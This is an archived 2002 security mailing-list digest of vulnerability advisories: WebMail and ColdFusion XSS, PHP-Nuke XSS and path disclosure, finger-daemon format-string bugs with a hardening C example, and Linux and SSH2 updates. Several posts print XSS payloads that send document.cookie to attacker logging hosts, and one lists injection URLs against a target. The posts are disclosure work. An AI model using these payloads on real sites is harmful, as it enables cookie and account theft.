Captaris (Infinite) WebMail XSS

2002-12-16 Thread Pedram Amini
I figured it was about time I hopped on the XSS band-wagon.

Captaris' (www.captaris.com) Infinite WebMail application is vulnerable to
Cross-Site Scripting (XSS) attacks. The application fails to filter the
following tags, both of which can be used to redirect a user to an attack script:

Launch on e-mail open:
http://attackers.server/cgi-bin/logger.cgi?'
+document.cookie)">

Launch on mouse over:
http://attackers.server/cgi-bin/logger.cgi?'
+document.cookie\">

I am sure there are other XSS attack methods that can also be utilized to
bypass their basic filtering.

A sample vulnerable service is provided by dog.com (www.dogmail.com); they
are running WebMail v3.61.05. A sample cookie and mail logger script that
will retrieve all of the messages in the user's main mailbox has been
attached, and can also be found at
http://pedram.redhive.com/advisories/dogmail.cgi

-pedram
http://pedram.redhive.com




Security Patches for PHP Products

2002-12-16 Thread Frog Man
PHPSecure made some patches for security holes in PHP products.
Here is the list :


- ALP - Banner Ad 2.0 :
http://www.phpsecure.org/index.php?id=1&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=ALP

- Tight Auction 3.0 :
http://www.phpsecure.org/index.php?id=6&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=TightAuction

- PY-Membres 3.1 :
http://www.phpsecure.org/index.php?id=9&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=PY-Membres

- dobermann FORUM 0.5 :
http://www.phpsecure.org/index.php?id=8&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=dobermann FORUM

- phpnewsDev 1 :
http://www.phpsecure.org/index.php?id=10&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=phpnewsDev

- KillerProtection 1 :
http://www.phpsecure.org/index.php?id=11&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=KillerProtection

- phpSecurePages 0.27b :
http://www.phpsecure.org/index.php?id=12&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=phpSecurePages

- Avotravis 2.1 :
http://www.phpsecure.org/index.php?id=13&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=Avotravis

- PunxNews 2.1 :
http://www.phpsecure.org/index.php?id=14&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=PunxNews

- phpforge 2.3 :
http://www.phpsecure.org/index.php?id=15&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=phpforge

- phpforge 3b2 :
http://www.phpsecure.org/index.php?id=60&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=phpforge

- Inertianews 0.02 beta :
http://www.phpsecure.org/index.php?id=17&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=Inertianews

- MySimpleNews 1 :
http://www.phpsecure.org/index.php?id=16&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=MySimpleNews

- Pollen 1.4.1 :
http://www.phpsecure.org/index.php?id=18&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=Pollen

- Pphlogger (Power Phlogger) 2.0.9 :
http://www.phpsecure.org/index.php?id=7&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=Pphlogger (Power Phlogger)

- News Evolution 1.0 :
http://www.phpsecure.org/index.php?id=21&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=News Evolution

- News Evolution 2.0 :
http://www.phpsecure.org/index.php?id=22&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=News Evolution

- LokwaBB 1.2.2 :
http://www.phpsecure.org/index.php?id=23&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=LokwaBB

- Rose 4.52 :
http://www.phpsecure.org/index.php?id=24&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=Rose

- WebChat for XOOPS RC3 1-5 :
http://www.phpsecure.org/index.php?id=25&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=WebChat for XOOPS RC3

- EasyNews 4.2 , 4.3 :
http://www.phpsecure.org/index.php?id=26&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=EasyNews

- Mon Album 0.6.2d :
http://www.phpsecure.org/index.php?id=27&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=Mon Album

- XOOPS RC3 :
http://www.phpsecure.org/index.php?id=61&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=XOOPS

- Photo Db 1.4 :
http://www.phpsecure.org/index.php?id=28&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=Photo Db

- PHP Image View 1.0 :
http://www.phpsecure.org/index.php?id=29&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=PHP Image View

- mcPass 1 :
http://www.phpsecure.org/index.php?id=30&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=mcPass

- Pseudo-Frame 1.0 :
http://www.phpsecure.org/index.php?id=31&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=Pseudo-Frame

- SimpleBBS 1.0.3 :
http://www.phpsecure.org/index.php?id=32&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=SimpleBBS

- SimpleBBS 1.0.6 :
http://www.phpsecure.org/index.php?id=33&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=SimpleBBS

- WSC (Web Server Creator) - Web Portal 0.1 :
http://www.phpsecure.org/index.php?id=34&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=WSC (Web Server Creator) - Web Portal

- Immobilier 1 :
http://www.phpsecure.org/index.php?id=35&zone=pDl
More details :
http://online.securityfocus.com/search?category=22&query=Immobilier

- FreeNews 2.1 :
http://www.phpsecure.org/index.php?i

[CLA-2002:553] Conectiva Linux Security Announcement - kernel 2.4

2002-12-16 Thread secure
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
CONECTIVA LINUX SECURITY ANNOUNCEMENT 
- --

PACKAGE   : kernel 2.4
SUMMARY   : Local denial of service vulnerability
DATE      : 2002-12-16 17:41:00
ID        : CLA-2002:553
RELEVANT
RELEASES  : 7.0, 8

- -

DESCRIPTION
 The Linux kernel is responsible for handling the basic functions of
 the Conectiva Linux operating system.
 
 Christophe Devine reported[1] a vulnerability in versions prior to
 2.4.20 of the linux kernel that could be exploited by a local
 non-root user to completely "freeze" the machine. A local attacker
 could exploit this vulnerability to cause a Denial of Service (DoS)
 condition. This update fixes this problem.
 
 Please note that the updated kernel packages listed here have been
 available on our update servers since November 20, 2002.


SOLUTION
 All users should upgrade the kernel immediately.
 
 IMPORTANT: it is not possible to use apt to apply kernel updates.
 These packages have to be updated manually. Generic kernel update
 instructions can be found in our updates page[2].
 
 Kernel 2.2 users in Conectiva Linux 6.0 and 7.0 are also vulnerable
 to this issue. It is recommended that these users upgrade to the
 latest (2.4) kernel, but updated packages for the 2.2 series are
 being prepared and will be released in the near future.
 
 
 REFERENCES:
 1.http://online.securityfocus.com/archive/1/299687/2002-11-11/2002-11-17/0
 2.http://distro.conectiva.com.br/atualizacoes/?idioma=en


UPDATED PACKAGES
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/kernel-2.4.12-4U70_4cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/kernel-2.4.12-4U70_4cl.i586.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/kernel-2.4.12-4U70_4cl.i686.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/kernel-BOOT-2.4.12-4U70_4cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/kernel-doc-2.4.12-4U70_4cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/kernel-enterprise-2.4.12-4U70_4cl.i686.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/kernel-headers-2.4.12-4U70_4cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/kernel-smp-2.4.12-4U70_4cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/kernel-smp-2.4.12-4U70_4cl.i586.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/kernel-smp-2.4.12-4U70_4cl.i686.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/kernel-source-2.4.12-4U70_4cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/kernel-2.4.12-4U70_4cl.src.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-2.4.19-1U80_5cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-2.4.19-1U80_5cl.i586.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-2.4.19-1U80_5cl.i686.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-BOOT-2.4.19-1U80_5cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-doc-2.4.19-1U80_5cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-enterprise-2.4.19-1U80_5cl.i686.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-headers-2.4.19-1U80_5cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-rbc-2.4.19-1U80_5cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-smp-2.4.19-1U80_5cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-smp-2.4.19-1U80_5cl.i586.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-smp-2.4.19-1U80_5cl.i686.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/kernel-source-2.4.19-1U80_5cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/SRPMS/kernel-2.4.19-1U80_5cl.src.rpm


ADDITIONAL INSTRUCTIONS
 Users of Conectiva Linux version 6.0 or higher may use apt to perform 
 upgrades of RPM packages:

 - run: apt-get update
 - after that, execute: apt-get upgrade

 Detailed instructions regarding the use of apt and upgrade examples 
 can be found at http://distro.conectiva.com.br/atualizacoes/#apt?idioma=en


- -
All packages are signed with Conectiva's GPG key. The key and instructions
on how to import it can be found at 
http://distro.conectiva.com.br/seguranca/chave/?idioma=en
Instructions on how to check the signatures of the RPM packages can be
found at http://distro.conectiva.com.br/seguranca/politica/?idioma=en
- -
All our advisories and generic update instructions can be viewed at
http://distro.conectiva.com.br/atualizacoes/?idioma=en

- -
subscribe: [EMAIL PROTECTED]
unsubscribe: [EMAIL PROTECTED]

[CLA-2002:554] Conectiva Linux Security Announcement - fetchmail

2002-12-16 Thread secure
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
CONECTIVA LINUX SECURITY ANNOUNCEMENT 
- --

PACKAGE   : fetchmail
SUMMARY   : Remote vulnerability
DATE      : 2002-12-16 18:38:00
ID        : CLA-2002:554
RELEVANT
RELEASES  : 6.0, 7.0, 8

- -

DESCRIPTION
 Fetchmail is a popular mail retrieval and forwarding utility.
 
 Stefan Esser discovered[1] a buffer overflow vulnerability in
 fetchmail versions prior to 6.1.3 (inclusive) that can be exploited
 remotely with the use of specially crafted mail messages. By
 exploiting this, the attacker can crash fetchmail or execute arbitrary
 code with the privileges of the user running it.
 
 The updated packages listed in this announcement include a fix for
 this problem.


SOLUTION
 All fetchmail users should upgrade.
 
 IMPORTANT: if fetchmail is running as a daemon, it will have to be
 restarted in order to run the new version.
 
 
 REFERENCES:
 1.http://security.e-matters.de/advisories/052002.html


UPDATED PACKAGES
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/fetchmail-5.9.12-1U60_4cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/fetchmailconf-5.9.12-1U60_4cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/fetchmail-doc-5.9.12-1U60_4cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/fetchmail-5.9.12-1U60_4cl.src.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/fetchmail-5.9.12-1U70_4cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/fetchmailconf-5.9.12-1U70_4cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/fetchmail-doc-5.9.12-1U70_4cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/fetchmail-5.9.12-1U70_4cl.src.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/fetchmail-5.9.12-1U80_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/fetchmailconf-5.9.12-1U80_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/fetchmail-doc-5.9.12-1U80_3cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/SRPMS/fetchmail-5.9.12-1U80_3cl.src.rpm


ADDITIONAL INSTRUCTIONS
 Users of Conectiva Linux version 6.0 or higher may use apt to perform 
 upgrades of RPM packages:

 - run: apt-get update
 - after that, execute: apt-get upgrade

 Detailed instructions regarding the use of apt and upgrade examples 
 can be found at http://distro.conectiva.com.br/atualizacoes/#apt?idioma=en


- -
All packages are signed with Conectiva's GPG key. The key and instructions
on how to import it can be found at 
http://distro.conectiva.com.br/seguranca/chave/?idioma=en
Instructions on how to check the signatures of the RPM packages can be
found at http://distro.conectiva.com.br/seguranca/politica/?idioma=en
- -
All our advisories and generic update instructions can be viewed at
http://distro.conectiva.com.br/atualizacoes/?idioma=en

- -
subscribe: [EMAIL PROTECTED]
unsubscribe: [EMAIL PROTECTED]




RE: PFinger 0.7.8 format string vulnerability (#NISR16122002B)

2002-12-16 Thread Stefan Esser

Hello,

> Due to the way requests are logged the only way to exploit this
> vulnerability is through setting the DNS name of the fingering host to the
> attacker supplied format string.

I really wonder how you want to exploit this... Last time I checked
all tested resolvers (Linux/BSD/Solaris) did not allow % within domain
names and so your format string vulnerability is not exploitable at all...

Stefan Esser




PFinger 0.7.8 format string vulnerability (#NISR16122002B)

2002-12-16 Thread NGSSoftware Insight Security Research
NGSSoftware Insight Security Research Advisory

Name: PFinger Format String vulnerability
Systems: PFinger version 0.7.8 and earlier
Severity: High Risk
Vendor URL: http://www.xelia.ch/unix/pfinger/
Author: David Litchfield ([EMAIL PROTECTED])
Advisory URL: http://www.ngssoftware.com/advisories/pfinger.txt
Date: 16th December 2002
Advisory number: #NISR16122002B


Description
***
PFinger is an open-source replacement of the GNU Finger daemon. PFinger
suffers from a format string vulnerability that, when exploited, can allow
the remote execution of arbitrary code.

Details
***
The format string vulnerability arises due to an unsafe call to syslog() in
the log() function of log.c:

..
syslog(level, syslog_mem);
..

To make this safe a format string should be specified:

..
syslog(level,"%s", syslog_mem);
..

Due to the way requests are logged the only way to exploit this
vulnerability is through setting the DNS name of the fingering host to the
attacker supplied format string.


h_ent = gethostbyaddr((char *)&remaddr.sin_addr, sizeof(remaddr.sin_addr), AF_INET);

if (h_ent)
    conn.hostname = strdup(h_ent->h_name);
else
    conn.hostname = "(remote)";

log(LOG_INFO, "Connection from %s (%s)", conn.hostname, inet_ntoa(remaddr.sin_addr));


This code looks up the domain name of the fingering host and logs the
connection information. This appears to be the only place where user
controlled data is logged. For exploitation to succeed the attacker must
either control their own DNS, the DNS server of the target host or
alternatively spoof the DNS reply. This makes exploitation more difficult
but by no means impossible.


Fix Information
***
NGSSoftware alerted the author of PFinger with this problem on the 27th of
November, 2002. The author has responded and assured NGS that a fix will be
implemented shortly. Those who are comfortable with C and cc/gcc can fix
this themselves by editing log.c in the manner described in the "Details"
section above.

A check for this issue has been added to Typhon III, NGSSoftware's advanced
vulnerability assessment tool, of which, more information is available at
the NGSSite: http://www.ngssoftware.com/

For more information about format string vulnerabilities please read

http://www.nextgenss.com/papers/win32format.doc
http://julianor.tripod.com/usfs.html

About NGSSoftware
*
NGSSoftware design, research and develop intelligent, advanced application
security assessment scanners. Based in the United Kingdom, NGSSoftware have
offices in the South of London and the East Coast of Scotland. NGSSoftware's
sister company NGSConsulting, offers best of breed security consulting
services, specialising in application, host and network security
assessments.

http://www.ngssoftware.com/
http://www.ngsconsulting.com/

Telephone +44 208 401 0070
Fax +44 208 401 0076

[EMAIL PROTECTED]





zkfingerd 0.9.1 format string vulnerabilities (#NISR16122002A)

2002-12-16 Thread NGSSoftware Insight Security Research
NGSSoftware Insight Security Research Advisory

Name: zkfingerd Format String vulnerability
Systems: zkfingerd version 0.9.1 and earlier
Severity: High Risk
Vendor URL: http://sourceforge.net/projects/zkfingerd
Author: David Litchfield ([EMAIL PROTECTED])
Advisory URL: http://www.ngssoftware.com/advisories/zkfingerd.txt
Date: 16th December 2002
Advisory number: #NISR16122002A


Description
***
zkfingerd is an open-source replacement for standard finger daemons running
on Linux systems. zkfingerd suffers from several format string
vulnerabilities that, when exploited, can allow the remote execution of
arbitrary code.

Details
***
The first format string vulnerability can be found in the putlog() function
of log.c. An unsafe call is made to the syslog() function.

..
syslog(LOG_INFO, c);
..

To make this safe a format string should be specified:

..
syslog(LOG_INFO,"%s", c);
..

By fingering a "user" and designing a special format string as the user, it
is possible to overwrite arbitrary locations in memory with values supplied
by an attacker using the %n specifier. This can lead to arbitrary code
execution.


Further format string vulnerabilities, that all have the same root cause,
are due to the say() function:


void
say(char *fmt, ...)
{
    va_list ap;

    va_start(ap, fmt);
    vprintf(fmt, ap);
    va_end(ap);

    printf("\r\n");
    fflush(stdout);

    return;
}


If, when say() is called, the first argument is not a format string but
input a remote user can control then the vulnerability will manifest itself.
One such place is in the file_list() function:

if(S_ISDIR(st.st_mode))
{
    char *y, *z;
    files++;
    z = xmalloc(strlen(de->d_name) + 2);
    strcpy(z, de->d_name);
    strcat(z, "/");
    x = xmalloc(32 + strlen(de->d_name));
    y = my_ctime(st.st_mtime);
    sprintf(x, "\t%-12s\t%s\t-- DIR --", z, y);
    say(x);
    xfree(x);
    xfree(y);
    xfree(z);
    continue;
}

In this case if the name of a directory contains an attacker supplied format
string then it can overwrite arbitrary locations in memory with attacker
supplied values.


Fix Information
***
NGSSoftware alerted the author of zkfingerd to these problems on the 27th
of November, 2002. The author responded quickly and made the relevant
security fixes. Patched source code can be downloaded from CVS @ Sourceforge.

http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/zkfingerd/zkfingerd/src/

A check for this issue has been added to Typhon III, NGSSoftware's advanced
vulnerability assessment tool, of which, more information is available at
the NGSSite: http://www.ngssoftware.com/

For more information about format string vulnerabilities please read

http://www.nextgenss.com/papers/win32format.doc
http://julianor.tripod.com/usfs.html


About NGSSoftware
*
NGSSoftware design, research and develop intelligent, advanced application
security assessment scanners. Based in the United Kingdom, NGSSoftware have
offices in the South of London and the East Coast of Scotland. NGSSoftware's
sister company NGSConsulting, offers best of breed security consulting
services, specialising in application, host and network security
assessments.

http://www.ngssoftware.com/
http://www.ngsconsulting.com/

Telephone +44 208 401 0070
Fax +44 208 401 0076
[EMAIL PROTECTED]
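The two advisories above share one root cause: data that arrives from the network (a reverse-DNS name in PFinger, a directory entry in zkfingerd) is passed where a format string belongs. As an added example that is neither NGSSoftware's nor either daemon's code, the C below shows the hardened counterparts of both logging paths plus a hostname sanity check as defence in depth; the function names, the hostname limits and the sample inputs are this example's own assumptions.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Both daemons pass untrusted text where a format string belongs:
 *     syslog(level, syslog_mem);     and     say(x);  ->  vprintf(fmt, ap)
 * The fix is a constant format with the text as an argument:
 *     syslog(level, "%s", syslog_mem);
 * Compiling with -Wformat-security (gcc/clang) flags the non-literal form.
 * The helpers below write into a caller buffer instead of syslog()/stdout
 * so their output can be checked offline; names are this example's own. */

#define HOST_MAX  253   /* longest hostname a resolver should hand back */
#define LABEL_MAX 63    /* longest single DNS label */

/* Defence in depth for the PFinger case: accept a reverse-DNS result only
 * if it consists of letters, digits, '-' and '.' with non-empty labels.
 * Anything else (including '%') is replaced by a fixed string by the caller,
 * so metacharacters never reach the log even if a format bug remained. */
int hostname_is_sane(const char *name)
{
    size_t len, label = 0;
    if (name == NULL) return 0;
    len = strlen(name);
    if (len == 0 || len > HOST_MAX) return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (c == '.') {
            if (label == 0) return 0;   /* empty label: leading or doubled '.' */
            label = 0;
            continue;
        }
        if (!isalnum(c) && c != '-') return 0;
        if (++label > LABEL_MAX) return 0;
    }
    return 1;
}

/* Hardened version of the PFinger connection log: the only format string is
 * the literal below; the hostname and the address are arguments. */
int log_connection(char *out, size_t outsz, const char *h_name, const char *addr)
{
    const char *hostname = hostname_is_sane(h_name) ? h_name : "(remote)";
    return snprintf(out, outsz, "Connection from %s (%s)", hostname, addr);
}

/* Hardened version of zkfingerd's say(): it takes text, not a format. */
int say_safe(char *out, size_t outsz, const char *text)
{
    return snprintf(out, outsz, "%s\r\n", text);
}

/* Hardened version of the file_list() directory line: the entry name is a
 * %s argument at every step, so "%n" in a directory name stays literal. */
int dir_line(char *out, size_t outsz, const char *d_name, const char *mtime)
{
    char z[256], x[512];
    snprintf(z, sizeof z, "%s/", d_name);
    snprintf(x, sizeof x, "\t%-12s\t%s\t-- DIR --", z, mtime);
    return say_safe(out, outsz, x);
}

int main(void)
{
    char buf[600];
    /* Constructed inputs: a normal name, a name carrying directives, and a
     * directory entry carrying directives. */
    log_connection(buf, sizeof buf, "host.example.com", "192.0.2.10");
    puts(buf);
    log_connection(buf, sizeof buf, "%n%n%n.example", "192.0.2.11");
    puts(buf);
    dir_line(buf, sizeof buf, "%x%x%x", "Dec 16 2002");
    fputs(buf, stdout);
    return 0;
}
```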




Re: Cross-site scripting vulnerability in CF 5.0

2002-12-16 Thread SecurityFocus
Something to note:

The 'view admin log' feature in CF tends to cause stress on the CF
process, and also blocks the log file while it is open.

So, it's generally better (and safer, given this cross-site scripting
problem that's been around for years) to view the log files via a text
viewer on the system.

By default, they are in c:\cfusion\log\*.log


On Mon, 16 Dec 2002, KiLL CoLe wrote:

> Cross-site scripting vulnerability in CF 5.0.  This
> issue was brought up to Macromedia on July 22nd, 2002.
> Macromedia issued a fix to me, but I have not seen the
> fix made available to the public.  The ColdFusion
> Administrator allows you to view your application log
> via your web browser.  Under certain conditions, it is
> possible to remotely alter ColdFusion's application
> log.  Take the following code:
>
> 
>SELECT * FROM Products
>Where ProductId = #int(url.productid)#
> 
>
> If the INT function encounters a value that is not
> numeric, it throws an exception and writes the value
> that was passed to application.log. Should an
> unsuspecting administrator view the log file via their
> web browser, script could be executed.  Analyze this
> code:
> If url.productid (from the above example) were passed
> in as:
>
> 
> document.frame1.location="http://www.domain.com/index.cfm?stealcookie=";
> + document.cookie
>
> this would enable an attacker to steal the value of
> the ColdFusion administrator's cookie.  Decrypting the
> ColdFusion admin's password is well documented, and
> poses a mild-to-moderate threat to server security.
>
> **NOTE: there are dozens of other functions that throw
> exceptions similar to the INT function.
>
> __
> Do you Yahoo!?
> Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
> http://mailplus.yahoo.com
>
>




Cross-site scripting vulnerability in CF 5.0

2002-12-16 Thread KiLL CoLe
Cross-site scripting vulnerability in CF 5.0.  This
issue was brought up to Macromedia on July 22nd, 2002.
Macromedia issued a fix to me, but I have not seen the
fix made available to the public.  The ColdFusion
Administrator allows you to view your application log
via your web browser.  Under certain conditions, it is
possible to remotely alter ColdFusion's application
log.  Take the following code:


   SELECT * FROM Products
   Where ProductId = #int(url.productid)#


If the INT function encounters a value that is not
numeric, it throws an exception and writes the value
that was passed to application.log. Should an
unsuspecting administrator view the log file via their
web browser, script could be executed.  Analyze this
code:
If url.productid (from the above example) were passed
in as:


document.frame1.location="http://www.domain.com/index.cfm?stealcookie=";
+ document.cookie

this would enable an attacker to steal the value of
the ColdFusion administrator's cookie.  Decrypting the
ColdFusion admin's password is well documented, and
poses a mild-to-moderate threat to server security.

**NOTE: there are dozens of other functions that throw
exceptions similar to the INT function.

__
Do you Yahoo!?
Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
http://mailplus.yahoo.com



RE: Cross-site scripting vulnerability in CF 5.0

2002-12-16 Thread CORREIA, PATRICK
Does anyone have information on whether the same issue affects ColdFusion
MX?

__ 
Patrick K. Correia, Web Designer 
Clough, Harbour & Associates LLP 
http://www.cha-llp.com



-Original Message-
From: KiLL CoLe [mailto:[EMAIL PROTECTED]] 
Sent: Monday, December 16, 2002 1:16 PM
To: [EMAIL PROTECTED]
Subject: Cross-site scripting vulnerability in CF 5.0





PHP-Nuke 6.0 : Path Disclosure & Cross Site Scripting

2002-12-16 Thread Frog Man
Information :
°°
Product : PHP-Nuke
Version : 6.0
Website : http://www.phpnuke.org
Problems :
- Path Disclosure
- XSS


Development :
°°°
The majority of PHP-Nuke's files are included by modules.php or 
index.php.  To prevent direct access, PHP-Nuke uses two kinds of safety check.
The first one (e.g. in modules/Downloads/index.php) is :
---
if (!eregi("modules.php", $PHP_SELF)) {
   die ("You can't access this file directly...");
}
---

The second one (e.g. footer.php) :
---
if (eregi("footer.php",$PHP_SELF)) {
   Header("Location: index.php");
   die();
}
---

Some files lack these safety measures, and they have security holes.

Exploits :
°°
Path Disclosure :
http://[target]/modules/Downloads/voteinclude.php
http://[target]/modules/Your_Account/navbar.php
http://[target]/modules/Forums/attachment.php
http://[target]/modules/Forums/auth.php
http://[target]/modules/News/comments.php
http://[target]/modules/Private_Messages/functions.php
http://[target]/modules/Private_Messages/index.php
http://[target]/modules/Private_Messages/read.php
http://[target]/modules/Private_Messages/reply.php
http://[target]/modules/Web_Links/voteinclude.php
http://[target]/modules/WebMail/contactbook.php?user=1

Path Disclosure & Cross Site Scripting :
- http://[target]/modules/Forums/bb_smilies.php?name=[SCRIPT]
or http://[target]/modules/Forums/bb_smilies.php?Default_Theme=[SCRIPT]
or 
http://[target]/modules/Forums/bb_smilies.php?site_font=}-->[SCRIPT]
or http://[target]/modules/Forums/bb_smilies.php?bgcolor1=";>[SCRIPT]
or with :
$sitename
$table_width
$color1
$forumver

- /modules/Forums/bbcode_ref.php with :
$name
$Default_Theme
$site_font
$sitename
$bgcolor2
$textcolor1
$bgcolor1
$forumver

- /modules/Forums/editpost.php, /modules/Forums/newtopic.php, 
/modules/Forums/reply.php, /modules/Forums/topicadmin.php, 
/modules/Forums/viewforum.php with :
$name

- /modules/Forums/searchbb.php with :
$name
$bgcolor3
$bgcolor1


Patch :
°°°
A patch can be found on http://www.phpsecure.org .


More details :
°°
In French :
http://www.frog-man.org/tutos/PHPNuke6.0.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FPHPNuke6.0.txt&langpair=fr%7Cen&hl=en&ie=ASCII&oe=ASCII

frog-m@n



_
MSN Messenger: chat live with your friends!
http://www.msn.fr/msger/default.asp



R7-0009: Vulnerabilities in SSH2 Implementations from Multiple Vendors

2002-12-16 Thread Rapid 7 Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

___
 Rapid 7, Inc. Security Advisory

Visit http://www.rapid7.com/ to download NeXpose(tm), our
 advanced vulnerability scanner. Linux and Windows 2000
   versions are available now!
___

Rapid 7 Advisory R7-0009
Vulnerabilities in SSH2 Implementations from Multiple Vendors

   Published:  December 16, 2002
   Revision:   1.0
   http://www.rapid7.com/advisories/R7-0009.txt

   CERT:   CA-2002-36
   http://www.cert.org/advisories/CA-2002-36.html

   CVE:Multiple CVE CANs assigned:
   o CAN-2002-1357 (incorrect length)
   o CAN-2002-1358 (lists with empty elements/empty strings)
   o CAN-2002-1359 (large packets and large fields)
   o CAN-2002-1360 (string fields with zeros)

1. Affected system(s):

   KNOWN VULNERABLE:
o F-Secure Corp. SSH servers and clients for UNIX
   v3.1.0 (build 11) and earlier
o F-Secure Corp. SSH for Windows
   v5.2 and earlier
o SSH Communications Security, Inc. SSH for Windows
   v3.2.2 and earlier
o SSH Communications Security, Inc. SSH for UNIX
   v3.2.2 and earlier
o FiSSH SSH client for Windows
   v1.0A and earlier
o InterSoft Int'l, Inc. SecureNetTerm client for Windows
   v5.4.1 and earlier
o NetComposite ShellGuard SSH client for Windows
   v3.4.6 and earlier
o Pragma Systems, Inc. SecureShell SSH server for Windows
   v2 and earlier
o PuTTY SSH client for Windows
   v0.53 and earlier (v0.53b not affected)
o WinSCP SCP client for Windows
   v2.0.0 and earlier

   APPARENTLY NOT VULNERABLE:
o BitVise WinSSHD server for Windows v3.05
o LSH v1.5
o OpenSSH v3.5 and earlier
o TTSSH SSH Extension for TeraTerm Pro
o VanDyke SecureCRT client v3.4.3 for Windows
o VanDyke VShell server v1.2 for Windows

   UNKNOWN / NOT TESTED:
o MacSSH
o SSHv1 implementations (see {1})
o SSHv2 enabled network appliances

2. Summary

   SSH servers and clients from several vendors contain vulnerabilities
   that may allow denial-of-service attacks and/or arbitrary code
   execution.  The vulnerabilities arise from various deficiencies in
   the greeting and key-exchange-initialization phases of the SSHv2
   transport layer.

3. Vendor status and information

   F-Secure Corporation
   http://www.f-secure.com

  Vendor has been notified.  Release information is unknown at
  this time.  F-Secure has characterized this issue as not
  exploitable.

   FiSSH
   http://pgpdist.mit.edu/FiSSH/index.html

  Vendor has been notified.  Release information is unknown at
  this time.

   NetComposite (ShellGuard)
   http://www.shellguard.com

  Vendor has been notified.  Release information is unknown at
  this time.

   Pragma Systems, Inc.
   http://www.pragmasys.com

  Vendor has been notified.  The fixed version is SecureShell
  v3.0, which was released on November 25 2002.

   PuTTY
   http://www.chiark.greenend.org.uk/~sgtatham/putty/

  Vendor has been notified.  The fixed version is PuTTY v0.53b,
  which was released on November 12, 2002.

   SSH Communications Security, Inc.
   http://www.ssh.com

  Vendor has been notified.  Release information is unknown at
  this time.  SSH, Inc. has characterized this issue as not
  exploitable.

   SecureNetTerm (InterSoft International, Inc.)
   http://www.securenetterm.com

  Vendor notified.  The fixed version is SecureNetTerm v5.4.2,
  released on November 14 2002.

